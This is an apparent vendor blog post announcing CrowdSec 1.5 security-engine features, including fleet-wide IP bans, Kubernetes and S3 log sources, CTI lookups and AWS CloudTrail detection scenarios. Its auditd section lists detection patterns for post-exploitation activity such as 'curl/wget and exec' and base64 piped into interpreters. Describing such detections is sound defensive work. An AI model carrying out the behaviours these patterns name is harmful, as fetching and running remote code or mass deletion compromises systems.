We are excited to share that CrowdSec 1.5 will be dropping in July with tons of new features and capabilities. Before we fully launch it, we will first be sharing the beta version on April 1st with some of our community members so they can test out the biggest version of Crowdsec since 1.0. Take a look at what will be in this version and at the very bottom, you can sign up to be one of the first to try it out.
Polling API Integration
With the polling API, the Console can now send orders to the CrowdSec instances. Allowing users to manage their decisions (banned IPs at a given time). Let’s dive into what that means.
Real-time decisions management
This is very useful for users with a lot of instances. For example, if you have 500 instances and want to ban an IP on all your machines, you would typically need to do some sort of automation such as a script to do it. Now, you can easily do it from the Console from the comfort of a single page.
Teaser: Secure and custom configure the fleet of instances from the Console
In the future, the polling API feature will allow users to set up parsers and scenarios directly from the CrowdSec Console.
New Blocklist API
We recently announced the external IP blocklists which allow all Console users to subscribe to at least 2 third-party blocklists selected by our expert team as well as 3 premium blocklists for our Enterprise users. We have since gathered a large number of significant data that we were able to build bigger blocklists. The blocklists are more robust and have no performance impact when you subscribe to them.
Kubernetes audit acquisition
The feature we presented at Kubehuddle UK 2022 is finally here:
We could already protect services within Kubernetes but now we can detect malicious behaviors at the cluster level: privileged pod creation, exec into a pod, mounting a sensitive host folder, anonymous API access, API brute force etc.
S3 audit acquisition
Crowdsec now supports reading logs stored in S3 bucket, allowing you to process logs generated by AWS services (such as ALB access logs or Cloudfront logs)
Auditd support
Allows to detect “Post Exploitation Behaviors” among which:
- base64 + interpreter (perl/bash/python)
- curl/wget and exec
- pkill execve bursts
- rm execve bursts
- exec from suspicious locations
CrowdSec CTI API helpers
Query CTI from parsers and scenarios and react differently based on their reputation, classification, and/or from the known false positives.
This new CTI API allows CrowdSec and the CTI to be more interactive with each other, allowing users to get much more information on a certain IP. For example, you can understand what the machine is doing, what kind of usage it is doing as well as what kind of attacks it has received. CrowdSec is now able to query all this data in real-time and can help users detect false positives and it also helps with alert fatigue.
Not only can you leverage the alert fatigue from the Console but also from your software. Alerts will only be sent once for the same malicious IP. We alert on how confident we are with the activity that IP is doing.
AWS Cloudtrail Scenarios
Thanks to 1.5’s new behavior detection capabilities, we were able to create an advanced AWS Cloudtrail scenario helping you to detect and better understand what’s happening on your cloud.
- Detect AWS CloudTrail configuration change
- Detect AWS Config configuration change
- Detect AWS console authentication failure
- Detect AWS IAM policy change
- Detect AWS KMS key deletion
- Detect login without MFA to the AWS console
- Detect AWS NACL change
- Detect AWS Network Gateway change
- Detect AWS root account usage
- Detect AWS route table change
- Detect AWS S3 bucket policy change
- Detect AWS Security Group change
- Detect AWS API unauthorized calls
- Detect AWS VPC change
Feature flag support
This new feature allows us to have some features within the Security Engine that are disabled by default but can be activated manually by the user.
This will facilitate the inclusion of beta features safely and give more chances to the community to preview what’s coming and help us test them in diverse use cases
Detection Engine improvements
- Conditional buckets: an improvement of our behavior detection system allows for more complex expression for the alert triggering mechanism
- Event data stash: allows parsers to capture data for future enrichment. Adding the capability to detect advanced malicious behaviors
CAPI Whitelist
While the community blocklist is highly curated, and designed to avoid false positives, sometimes a shared IP used by both innocent and malicious actors will end up in it, so we’ve added the capability to create whitelists that also apply to the community blocklist.
Conclusion
We are rolling out the beta version on April 1st and will allow a handful of our community members to test it out. If you are interested in being one of the first to test it out and give us your feedback, contact us! We will allow all testers to have 2 months free of all the new features as well as premium ones, as thanks for helping us with this new version.